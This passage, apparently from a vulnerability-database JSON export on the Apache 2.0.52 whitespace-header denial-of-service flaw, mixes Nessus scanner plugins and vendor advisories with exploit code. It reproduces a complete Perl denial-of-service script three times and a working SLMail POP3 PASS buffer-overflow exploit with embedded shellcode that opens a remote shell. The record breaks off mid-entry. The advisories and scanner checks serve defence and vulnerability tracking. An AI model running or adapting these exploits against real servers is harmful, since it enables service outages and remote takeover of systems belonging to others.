Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:562\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"httpd-2.0.46-44.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"httpd-devel-2.0.46-44.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"mod_ssl-2.0.46-44.ent\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / mod_ssl\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-01T03:42:23", "description": "The remote host is running a version of Mac OS X 10.4 or 10.3 that\ndoes not have Security Update 2005-007 applied.\n\nThis security update contains fixes for the following products :\n\n - Apache 2\n - AppKit\n - Bluetooth\n - CoreFoundation\n - CUPS\n - Directory Services\n - HItoolbox\n - Kerberos\n - loginwindow\n - Mail\n - MySQL\n - OpenSSL\n - QuartzComposerScreenSaver\n - ping\n - Safari\n - SecurityInterface\n - servermgrd\n - servermgr_ipfilter\n - SquirelMail\n - traceroute\n - WebKit\n - WebLog Server\n - X11\n - zlib", "edition": 25, "published": "2005-08-18T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2005-007)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2526", "CVE-2005-2506", "CVE-2005-2509", "CVE-2005-2502", "CVE-2005-2519", "CVE-2005-0605", "CVE-2005-1849", "CVE-2005-0711", "CVE-2005-2523", "CVE-2005-1689", "CVE-2005-2520", "CVE-2005-2524", "CVE-2005-2504", "CVE-2005-2514", "CVE-2004-0885", "CVE-2004-0112", "CVE-2005-2510", "CVE-2005-1174", "CVE-2004-0942", "CVE-2005-2513", "CVE-2005-0709", "CVE-2004-1084", "CVE-2004-0079", "CVE-2005-2507", "CVE-2005-2522", "CVE-2005-2515", "CVE-2005-2745", "CVE-2005-2508", "CVE-2005-2503", "CVE-2005-2521", "CVE-2005-2095", "CVE-2005-1344", "CVE-2005-2096", "CVE-2005-0710", "CVE-2005-2516", "CVE-2005-1175", "CVE-2005-1769", "CVE-2005-2511", "CVE-2004-1189", "CVE-2004-1083", "CVE-2005-2512", "CVE-2005-2525", "CVE-2005-2505", "CVE-2005-2517", "CVE-2005-2518", "CVE-2005-2501"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2005-007.NASL", "href": "https://www.tenable.com/plugins/nessus/19463", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\nif (NASL_LEVEL < 3004) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(19463);\n script_version (\"1.15\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\"CVE-2005-1344\", \"CVE-2004-0942\", \"CVE-2004-0885\", \"CVE-2004-1083\", \"CVE-2004-1084\",\n \"CVE-2005-2501\", \"CVE-2005-2502\", \"CVE-2005-2503\", \"CVE-2005-2504\", \"CVE-2005-2505\",\n \"CVE-2005-2506\", \"CVE-2005-2525\", \"CVE-2005-2526\", \"CVE-2005-2507\", \"CVE-2005-2508\",\n \"CVE-2005-2519\", \"CVE-2005-2513\", \"CVE-2004-1189\", \"CVE-2005-1174\", \"CVE-2005-1175\",\n \"CVE-2005-1689\", \"CVE-2005-2511\", \"CVE-2005-2509\", \"CVE-2005-2512\", \"CVE-2005-2745\",\n \"CVE-2005-0709\", \"CVE-2005-0710\", \"CVE-2005-0711\", \"CVE-2004-0079\", \"CVE-2004-0112\",\n \"CVE-2005-2514\", \"CVE-2005-2515\", \"CVE-2005-2516\", \"CVE-2005-2517\", \"CVE-2005-2524\",\n \"CVE-2005-2520\", \"CVE-2005-2518\", \"CVE-2005-2510\", \"CVE-2005-1769\", \"CVE-2005-2095\",\n \"CVE-2005-2521\", \"CVE-2005-2522\", \"CVE-2005-2523\", \"CVE-2005-0605\", \"CVE-2005-2096\",\n \"CVE-2005-1849\");\n script_bugtraq_id(14567, 14569);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2005-007)\");\n script_summary(english:\"Check for Security Update 2005-007\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes various\nsecurity issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.4 or 10.3 that\ndoes not have Security Update 2005-007 applied.\n\nThis security update contains fixes for the following products :\n\n - Apache 2\n - AppKit\n - Bluetooth\n - CoreFoundation\n - CUPS\n - Directory Services\n - HItoolbox\n - Kerberos\n - loginwindow\n - Mail\n - MySQL\n - OpenSSL\n - QuartzComposerScreenSaver\n - ping\n - Safari\n - SecurityInterface\n - servermgrd\n - servermgr_ipfilter\n - SquirelMail\n - traceroute\n - WebKit\n - WebLog Server\n - X11\n - zlib\" );\n # http://web.archive.org/web/20060406190355/http://docs.info.apple.com/article.html?artnum=302163\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://www.nessus.org/u?74ffa359\"\n );\n script_set_attribute(attribute:\"solution\", value:\n\"!Install Security Update 2005-007.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/08/18\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2005/08/12\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"MacOS X Local Security Checks\");\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n#\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! packages ) exit(0);\n\n\nuname = get_kb_item(\"Host/uname\");\n# MacOS X 10.4.2\nif ( egrep(pattern:\"Darwin.* (7\\.[0-9]\\.|8\\.2\\.)\", string:uname) )\n{\n if (!egrep(pattern:\"^SecUpd(Srvr)?2005-007\", string:packages)) security_hole(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T13:01:41", "description": "Apache <= 2.0.52 HTTP GET request Denial of Service Exploit. CVE-2004-0942. Dos exploits for multiple platform", "published": "2005-03-04T00:00:00", "type": "exploitdb", "title": "Apache <= 2.0.52 HTTP GET request Denial of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0942"], "modified": "2005-03-04T00:00:00", "id": "EDB-ID:855", "href": "https://www.exploit-db.com/exploits/855/", "sourceData": "#!/usr/bin/perl\r\n\r\n# Based on -> \r\n# apache-squ1rt.c exploit.\r\n#\r\n# Original credit goes to Chintan Trivedi on the\r\n# FullDisclosure mailing list:\r\n# http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html\r\n#\r\n# More info ->\r\n# \r\n# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942\r\n# Added ->\r\n# Added future with we can exploit Apache web servers on windows system. For it you should experiment\r\n# with [trys] parameter of this code.\r\n# \r\n# By default parameter trys = 8000, for DoS Apache web servers on windows system try to \r\n# increase this parameter.\r\n#\r\n# For example. In my system I have 256Mb of RAM. For DoS Apache web severs I run this exploit like this\r\n#\r\n# C:\\perl ap2.0.52_dos.pl 127.0.0.1 30000\r\n#\r\n# <+> Prepare to start connect.\r\n# <+> Connected to 127.0.0.1\r\n# <+> Send of first part of devil header.\r\n# <+> Prepare to DoS with 10000 trys.\r\n# <+> Start DoS second part of devil header.\r\n# <SOD> |====================> <EOD>\r\n# <+> Ok now target web server maybe DoSeD.\r\n#\r\n#\r\n# Note -> \r\n# \r\n# If progresbar not response server mybe already DoSeD. Try to open web page hosted on this web servers.\r\n# And if you see \"Eror 500\" you are lucky man :)\r\n#\r\n# Warnings -> \r\n# This is POC code you can use only on you own servers. Writer don't response if you damadge you servers or\r\n# use it for attack, or others things. \r\n#\r\n# Shit -> \r\n# My English now is bulls shit :( I try study it :)\r\n# \r\n\r\n# Tested under Window 2000 SP4 with Apache 2.0.49 (Win)\r\n\r\n# Grests fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.\r\n\r\n# Contact to me at greenwood3[AT]yandex[dot]ru\r\n\r\nuse IO::Socket;\r\n\r\nif (@ARGV <1)\r\n {\r\n print \"\\n ::: ---------------------------------------------- :::\\n\";\r\n print \" ::: Another yet DoS exploit for Apache <= 2.0.52 :::\\n\";\r\n print \" ::: Usage: ap2.0.52_dos.pl <ip> [trys] :::\\n\";\r\n print \" ::: Coded by GreenwooD from Network Security Team :::\\n\";\r\n print \" ::: ---------------------------------------------- :::\\n\";\r\n exit();\r\n }\r\n\r\nprint \"\\n <+> Prepare to start connect.\\n\";\r\n\r\n$s = IO::Socket::INET->new(Proto=>\"tcp\",\r\n PeerAddr=>$ARGV[0],\r\n PeerPort=>80,\r\n Timeout=>6\r\n ) or die \" <-> Target web server already DoSeD ??? or can't connect :(\\n\";\r\n $s->autoflush();\r\n\r\nprint \" <+> Connected to $ARGV[0]\\n\";\r\nprint \" <+> Send of first part of devil header.\\n\"; \r\n \r\n print $s \"GET / HTTP/1.0\\n\";\r\n\r\n$trys = 8000; # Default\r\n\r\nif ($ARGV[1])\r\n{\r\n $trys = $ARGV[1];\r\n}\r\n\r\nprint \" <+> Prepare to DoS with $trys trys.\\n\";\r\nprint \" <+> Start DoS send second part of devil header.\\n\"; \r\nprint \" <SOD> |\";\r\n\r\n$i=0;\r\n\r\n do {\r\n\r\n print $s (\" \" x 8000 . \"\\n\"); \r\n\r\n \r\n if ($i % 500 == 0)\r\n { \r\n print \"=\";\r\n } \r\n\r\n ++$i;\r\n\r\n } until ($i == $trys); \r\n\r\n\r\nprint \"> <EOD>\\n\";\r\n\r\nclose($s);\r\n\r\nprint \" <+> Ok now target web server maybe DoSeD.\\n\"; \n\n# milw0rm.com [2005-03-04]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/855/"}], "freebsd": [{"lastseen": "2019-05-29T18:35:09", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0942"], "description": "\nIt is possible for remote attackers to cause a denial-of-service\n\t scenario on Apache 2.0.52 and earlier by sending an HTTP GET\n\t request with a MIME header containing multiple lines full of\n\t whitespaces.\n", "edition": 4, "modified": "2004-11-11T00:00:00", "published": "2004-11-01T00:00:00", "id": "282DFEA0-3378-11D9-B404-000C6E8F12EF", "href": "https://vuxml.freebsd.org/freebsd/282dfea0-3378-11d9-b404-000c6e8f12ef.html", "title": "apache2 multiple space header denial-of-service vulnerability", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "httpd": [{"lastseen": "2016-09-26T21:39:38", "bulletinFamily": "software", "cvelist": ["CVE-2004-0942"], "description": "\n\nAn issue was discovered where the field length limit was not enforced\nfor certain malicious requests. This could allow a remote attacker who\nis able to send large amounts of data to a server the ability to cause\nApache children to consume proportional amounts of memory, leading to\na denial of service.\n\n", "edition": 1, "modified": "2005-02-08T00:00:00", "published": "2004-10-28T00:00:00", "id": "HTTPD:7DB6A0BF4F2F0BA0A5CF3BF679509342", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.0.53: Memory consumption DoS", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-12-24T14:26:52", "bulletinFamily": "software", "cvelist": ["CVE-2004-0942"], "description": "\n\nAn issue was discovered where the field length limit was not enforced\nfor certain malicious requests. This could allow a remote attacker who\nis able to send large amounts of data to a server the ability to cause\nApache children to consume proportional amounts of memory, leading to\na denial of service.\n\n", "edition": 5, "modified": "2004-11-01T00:00:00", "published": "2004-10-28T00:00:00", "id": "HTTPD:544572A12CC21CCC7B8861E1ED83549F", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: Memory consumption DoS", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "seebug": [{"lastseen": "2017-11-19T14:07:02", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Apache <= 2.0.52 HTTP GET request Denial of Service Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0942"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-63025", "id": "SSV:63025", "sourceData": "\n #!/usr/bin/perl\r\n\r\n# Based on -> \r\n# apache-squ1rt.c exploit.\r\n#\r\n# Original credit goes to Chintan Trivedi on the\r\n# FullDisclosure mailing list:\r\n# http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html\r\n#\r\n# More info ->\r\n# \r\n# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942\r\n# Added ->\r\n# Added future with we can exploit Apache web servers on windows system. For it you should experiment\r\n# with [trys] parameter of this code.\r\n# \r\n# By default parameter trys = 8000, for DoS Apache web servers on windows system try to \r\n# increase this parameter.\r\n#\r\n# For example. In my system I have 256Mb of RAM. For DoS Apache web severs I run this exploit like this\r\n#\r\n# C:\\perl ap2.0.52_dos.pl 127.0.0.1 30000\r\n#\r\n# <+> Prepare to start connect.\r\n# <+> Connected to 127.0.0.1\r\n# <+> Send of first part of devil header.\r\n# <+> Prepare to DoS with 10000 trys.\r\n# <+> Start DoS second part of devil header.\r\n# <SOD> |====================> <EOD>\r\n# <+> Ok now target web server maybe DoSeD.\r\n#\r\n#\r\n# Note -> \r\n# \r\n# If progresbar not response server mybe already DoSeD. Try to open web page hosted on this web servers.\r\n# And if you see "Eror 500" you are lucky man :)\r\n#\r\n# Warnings -> \r\n# This is POC code you can use only on you own servers. Writer don't response if you damadge you servers or\r\n# use it for attack, or others things. \r\n#\r\n# Shit -> \r\n# My English now is bulls shit :( I try study it :)\r\n# \r\n\r\n# Tested under Window 2000 SP4 with Apache 2.0.49 (Win)\r\n\r\n# Grests fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.\r\n\r\n# Contact to me at greenwood3[AT]yandex[dot]ru\r\n\r\nuse IO::Socket;\r\n\r\nif (@ARGV <1)\r\n {\r\n print "\\n ::: ---------------------------------------------- :::\\n";\r\n print " ::: Another yet DoS exploit for Apache <= 2.0.52 :::\\n";\r\n print " ::: Usage: ap2.0.52_dos.pl <ip> [trys] :::\\n";\r\n print " ::: Coded by GreenwooD from Network Security Team :::\\n";\r\n print " ::: ---------------------------------------------- :::\\n";\r\n exit();\r\n }\r\n\r\nprint "\\n <+> Prepare to start connect.\\n";\r\n\r\n$s = IO::Socket::INET->new(Proto=>"tcp",\r\n PeerAddr=>$ARGV[0],\r\n PeerPort=>80,\r\n Timeout=>6\r\n ) or die " <-> Target web server already DoSeD ??? or can't connect :(\\n";\r\n $s->autoflush();\r\n\r\nprint " <+> Connected to $ARGV[0]\\n";\r\nprint " <+> Send of first part of devil header.\\n"; \r\n \r\n print $s "GET / HTTP/1.0\\n";\r\n\r\n$trys = 8000; # Default\r\n\r\nif ($ARGV[1])\r\n{\r\n $trys = $ARGV[1];\r\n}\r\n\r\nprint " <+> Prepare to DoS with $trys trys.\\n";\r\nprint " <+> Start DoS send second part of devil header.\\n"; \r\nprint " <SOD> |";\r\n\r\n$i=0;\r\n\r\n do {\r\n\r\n print $s (" " x 8000 . "\\n"); \r\n\r\n \r\n if ($i % 500 == 0)\r\n { \r\n print "=";\r\n } \r\n\r\n ++$i;\r\n\r\n } until ($i == $trys); \r\n\r\n\r\nprint "> <EOD>\\n";\r\n\r\nclose($s);\r\n\r\nprint " <+> Ok now target web server maybe DoSeD.\\n"; \r\n\r\n# milw0rm.com [2005-03-04]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-63025"}, {"lastseen": "2017-11-19T22:39:33", "description": "No description provided by source.", "published": "2005-03-04T00:00:00", "title": "Apache <= 2.0.52 HTTP GET request Denial of Service Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0942"], "modified": "2005-03-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15491", "id": "SSV:15491", "sourceData": "\n #!/usr/bin/perl\r\n\r\n# Based on -> \r\n# apache-squ1rt.c exploit.\r\n#\r\n# Original credit goes to Chintan Trivedi on the\r\n# FullDisclosure mailing list:\r\n# http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html\r\n#\r\n# More info ->\r\n# \r\n# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942\r\n# Added ->\r\n# Added future with we can exploit Apache web servers on windows system. For it you should experiment\r\n# with [trys] parameter of this code.\r\n# \r\n# By default parameter trys = 8000, for DoS Apache web servers on windows system try to \r\n# increase this parameter.\r\n#\r\n# For example. In my system I have 256Mb of RAM. For DoS Apache web severs I run this exploit like this\r\n#\r\n# C:\\perl ap2.0.52_dos.pl 127.0.0.1 30000\r\n#\r\n# <+> Prepare to start connect.\r\n# <+> Connected to 127.0.0.1\r\n# <+> Send of first part of devil header.\r\n# <+> Prepare to DoS with 10000 trys.\r\n# <+> Start DoS second part of devil header.\r\n# <SOD> |====================> <EOD>\r\n# <+> Ok now target web server maybe DoSeD.\r\n#\r\n#\r\n# Note -> \r\n# \r\n# If progresbar not response server mybe already DoSeD. Try to open web page hosted on this web servers.\r\n# And if you see "Eror 500" you are lucky man :)\r\n#\r\n# Warnings -> \r\n# This is POC code you can use only on you own servers. Writer don't response if you damadge you servers or\r\n# use it for attack, or others things. \r\n#\r\n# Shit -> \r\n# My English now is bulls shit :( I try study it :)\r\n# \r\n\r\n# Tested under Window 2000 SP4 with Apache 2.0.49 (Win)\r\n\r\n# Grests fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.\r\n\r\n# Contact to me at greenwood3[AT]yandex[dot]ru\r\n\r\nuse IO::Socket;\r\n\r\nif (@ARGV <1)\r\n {\r\n print "\\n ::: ---------------------------------------------- :::\\n";\r\n print " ::: Another yet DoS exploit for Apache <= 2.0.52 :::\\n";\r\n print " ::: Usage: ap2.0.52_dos.pl <ip> [trys] :::\\n";\r\n print " ::: Coded by GreenwooD from Network Security Team :::\\n";\r\n print " ::: ---------------------------------------------- :::\\n";\r\n exit();\r\n }\r\n\r\nprint "\\n <+> Prepare to start connect.\\n";\r\n\r\n$s = IO::Socket::INET->new(Proto=>"tcp",\r\n PeerAddr=>$ARGV[0],\r\n PeerPort=>80,\r\n Timeout=>6\r\n ) or die " <-> Target web server already DoSeD ??? or can't connect :(\\n";\r\n $s->autoflush();\r\n\r\nprint " <+> Connected to $ARGV[0]\\n";\r\nprint " <+> Send of first part of devil header.\\n"; \r\n \r\n print $s "GET / HTTP/1.0\\n";\r\n\r\n$trys = 8000; # Default\r\n\r\nif ($ARGV[1])\r\n{\r\n $trys = $ARGV[1];\r\n}\r\n\r\nprint " <+> Prepare to DoS with $trys trys.\\n";\r\nprint " <+> Start DoS send second part of devil header.\\n"; \r\nprint " <SOD> |";\r\n\r\n$i=0;\r\n\r\n do {\r\n\r\n print $s (" " x 8000 . "\\n"); \r\n\r\n \r\n if ($i % 500 == 0)\r\n { \r\n print "=";\r\n } \r\n\r\n ++$i;\r\n\r\n } until ($i == $trys); \r\n\r\n\r\nprint "> <EOD>\\n";\r\n\r\nclose($s);\r\n\r\nprint " <+> Ok now target web server maybe DoSeD.\\n"; \n\n# milw0rm.com [2005-03-04]\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-15491"}], "ubuntu": [{"lastseen": "2020-07-09T17:45:19", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0942"], "description": "Chintan Trivedi discovered a Denial of Service vulnerability in \napache2. The field length limit was not enforced for certain malicious \nrequests. This could allow a remote attacker who is able to send large \namounts of data to a server to cause HTTP server instances to consume \nproportional amounts of memory, which can render the service \nunavailable.", "edition": 5, "modified": "2004-11-12T00:00:00", "published": "2004-11-12T00:00:00", "id": "USN-23-1", "href": "https://ubuntu.com/security/notices/USN-23-1", "title": "apache2 vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:04", "description": "", "published": "2004-11-20T00:00:00", "type": "packetstorm", "title": "slmail5x.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0942"], "modified": "2004-11-20T00:00:00", "id": "PACKETSTORM:35097", "href": "https://packetstormsecurity.com/files/35097/slmail5x.txt.html", "sourceData": "`SLMail 5.x POP3 Remote Pass Buffer Overflow Exploit \n \nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942 \n \nINTRO: \n \nSLMail Pro is web-based POP3 and SMTP email server software for MicrosoftT \nWindows 2000 that includes advanced features usually found in \nenterprise-level systems. \nSeattlelab has been providing businesses with an alternative to expensive \nemail server software for 10 years. Because of its stability, features, and \nprice, SLMail Pro has created a niche in a competitive market, proving there \nis no need to spend a small fortune to implement a secure, full-featured \nemail server solution. \n \n \n \nPoC: \n \n###################################### \n# # \n# SLmail 5.5 POP3 PASS Buffer Overflow # \n# Discovered by : Muts # \n# Coded by : Muts # \n# WWW.WHITEHAT.CO.IL # \n# Plain vanilla stack overflow in the PASS command # \n# # \n###################################### \n# D:\\Projects\\BO>SLmail-5.5-POP3-PASS.py # \n###################################### \n# D:\\Projects\\BO>nc -v 192.168.1.167 4444 # \n# localhost.lan [192.168.1.167] 4444 (?) open # \n# Microsoft Windows 2000 [Version 5.00.2195] # \n# (C) Copyright 1985-2000 Microsoft Corp. # \n# C:\\Program Files\\SLmail\\System> # \n###################################### \n \nimport struct \nimport socket \n \nprint \"\\n\\n############################\" \nprint \"\\nSLmail 5.5 POP3 PASS Buffer Overflow\" \nprint \"\\nFound & coded by muts [at] whitehat.co.il\" \nprint \"\\nFor Educational Purposes Only!\" \nprint \"\\n\\n############################\" \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n \n \nsc = \"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\xe0\\x66\" \nsc += \"\\x1c\\xc2\\x83\\xeb\\xfc\\xe2\\xf4\\x1c\\x8e\\x4a\\xc2\\xe0\\x66\\x4f\\x97\\xb6\" \nsc += \"\\x31\\x97\\xae\\xc4\\x7e\\x97\\x87\\xdc\\xed\\x48\\xc7\\x98\\x67\\xf6\\x49\\xaa\" \nsc += \"\\x7e\\x97\\x98\\xc0\\x67\\xf7\\x21\\xd2\\x2f\\x97\\xf6\\x6b\\x67\\xf2\\xf3\\x1f\" \nsc += \"\\x9a\\x2d\\x02\\x4c\\x5e\\xfc\\xb6\\xe7\\xa7\\xd3\\xcf\\xe1\\xa1\\xf7\\x30\\xdb\" \nsc += \"\\x1a\\x38\\xd6\\x95\\x87\\x97\\x98\\xc4\\x67\\xf7\\xa4\\x6b\\x6a\\x57\\x49\\xba\" \nsc += \"\\x7a\\x1d\\x29\\x6b\\x62\\x97\\xc3\\x08\\x8d\\x1e\\xf3\\x20\\x39\\x42\\x9f\\xbb\" \nsc += \"\\xa4\\x14\\xc2\\xbe\\x0c\\x2c\\x9b\\x84\\xed\\x05\\x49\\xbb\\x6a\\x97\\x99\\xfc\" \nsc += \"\\xed\\x07\\x49\\xbb\\x6e\\x4f\\xaa\\x6e\\x28\\x12\\x2e\\x1f\\xb0\\x95\\x05\\x61\" \nsc += \"\\x8a\\x1c\\xc3\\xe0\\x66\\x4b\\x94\\xb3\\xef\\xf9\\x2a\\xc7\\x66\\x1c\\xc2\\x70\" \nsc += \"\\x67\\x1c\\xc2\\x56\\x7f\\x04\\x25\\x44\\x7f\\x6c\\x2b\\x05\\x2f\\x9a\\x8b\\x44\" \nsc += \"\\x7c\\x6c\\x05\\x44\\xcb\\x32\\x2b\\x39\\x6f\\xe9\\x6f\\x2b\\x8b\\xe0\\xf9\\xb7\" \nsc += \"\\x35\\x2e\\x9d\\xd3\\x54\\x1c\\x99\\x6d\\x2d\\x3c\\x93\\x1f\\xb1\\x95\\x1d\\x69\" \nsc += \"\\xa5\\x91\\xb7\\xf4\\x0c\\x1b\\x9b\\xb1\\x35\\xe3\\xf6\\x6f\\x99\\x49\\xc6\\xb9\" \nsc += \"\\xef\\x18\\x4c\\x02\\x94\\x37\\xe5\\xb4\\x99\\x2b\\x3d\\xb5\\x56\\x2d\\x02\\xb0\" \nsc += \"\\x36\\x4c\\x92\\xa0\\x36\\x5c\\x92\\x1f\\x33\\x30\\x4b\\x27\\x57\\xc7\\x91\\xb3\" \nsc += \"\\x0e\\x1e\\xc2\\xf1\\x3a\\x95\\x22\\x8a\\x76\\x4c\\x95\\x1f\\x33\\x38\\x91\\xb7\" \nsc += \"\\x99\\x49\\xea\\xb3\\x32\\x4b\\x3d\\xb5\\x46\\x95\\x05\\x88\\x25\\x51\\x86\\xe0\" \nsc += \"\\xef\\xff\\x45\\x1a\\x57\\xdc\\x4f\\x9c\\x42\\xb0\\xa8\\xf5\\x3f\\xef\\x69\\x67\" \nsc += \"\\x9c\\x9f\\x2e\\xb4\\xa0\\x58\\xe6\\xf0\\x22\\x7a\\x05\\xa4\\x42\\x20\\xc3\\xe1\" \nsc += \"\\xef\\x60\\xe6\\xa8\\xef\\x60\\xe6\\xac\\xef\\x60\\xe6\\xb0\\xeb\\x58\\xe6\\xf0\" \nsc += \"\\x32\\x4c\\x93\\xb1\\x37\\x5d\\x93\\xa9\\x37\\x4d\\x91\\xb1\\x99\\x69\\xc2\\x88\" \nsc += \"\\x14\\xe2\\x71\\xf6\\x99\\x49\\xc6\\x1f\\xb6\\x95\\x24\\x1f\\x13\\x1c\\xaa\\x4d\" \nsc += \"\\xbf\\x19\\x0c\\x1f\\x33\\x18\\x4b\\x23\\x0c\\xe3\\x3d\\xd6\\x99\\xcf\\x3d\\x95\" \nsc += \"\\x66\\x74\\x32\\x6a\\x62\\x43\\x3d\\xb5\\x62\\x2d\\x19\\xb3\\x99\\xcc\\xc2\" \n \n#Tested on Win2k SP4 Unpatched \n# Change ret address if needed \nbuffer = '\\x41' * 4654 + struct.pack('<L', 0x783d6ddf) + '\\x90'*32 + sc \ntry: \nprint \"\\nSending evil buffer...\" \ns.connect(('192.168.1.167',110)) \ndata = s.recv(1024) \ns.send('USER username' +'\\r\\n') \ndata = s.recv(1024) \ns.send('PASS ' + buffer + '\\r\\n') \ndata = s.recv(1024) \ns.close() \nprint \"\\nDone! Try connecting to port 4444 on victim machine.\" \nexcept: \nprint \"Could not connect to POP3!\"Regards to muts and WHSupport the Whoppix \nproject:http://whoppix.net/ \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/35097/slmail5x.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "cvelist": ["CVE-2004-0942"], "edition": 1, "description": "## Vulnerability Description\nApache contains a flaw that may allow a 